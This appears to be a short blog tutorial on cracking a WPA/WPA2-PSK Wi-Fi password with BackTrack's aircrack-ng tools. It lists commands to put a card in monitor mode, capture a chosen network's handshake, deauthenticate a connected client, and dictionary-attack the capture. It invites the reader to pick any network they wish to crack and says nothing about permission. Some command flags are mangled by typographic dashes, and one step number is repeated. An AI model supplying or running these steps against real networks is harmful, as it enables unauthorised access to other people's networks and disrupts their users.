Koneksi internet anda terputus. Tunggu dan coba lagi , atau Refresh Halaman.

Hack a Wifi Using BackTrack





Cracking a WPA or WPA2 wireless network is more difficult than cracking a WEP protected network because it depends on the complexity of the wireless password and on the attack method (Dictionary Attack or Brute Force Attack). Here you will learn step by step instructions how to crack WPA2 wifi password which uses a pre-shared keys (PSK) of a wireless network. This also applies to WPA secured network. 

Here are the basics steps we will be going through:

Step 1 :-  airmon-ng

Step 2 :-  airmon-ng wlan0

Step 3 :- airmon-ng start wlan0


Step 4 :-  airodump-ng mon0

 Wait for some time for all the networks to load then press Ctrl+C to stop the updates. Now choose the wireless network that you wish to crack which has “WPA” or “WPA2″ encryption in the “ENC” column, and “PSK” in the “AUTH” column. “OPN” means that the network is open and you can connect to it without a key, WEP will not work here. After selecting the network that you want to crack take note of the BSSID, and the channel (CH) values.

Step 5 :- airodump-ng –c 6 –bssid 1C:7E:E5:32:1D:54  –w      crack1 mon0


Step 6 :- aireplay-ng -0  0 –a 1c:7E:E5:32:1D:54  -c    00:21:5C:50:DE:2D mon0


Step 6 :- aircrack-ng –w /pentest/wireless/aircrack-ng/test/password.list  crack1.cap





Latest
Previous
Next Post »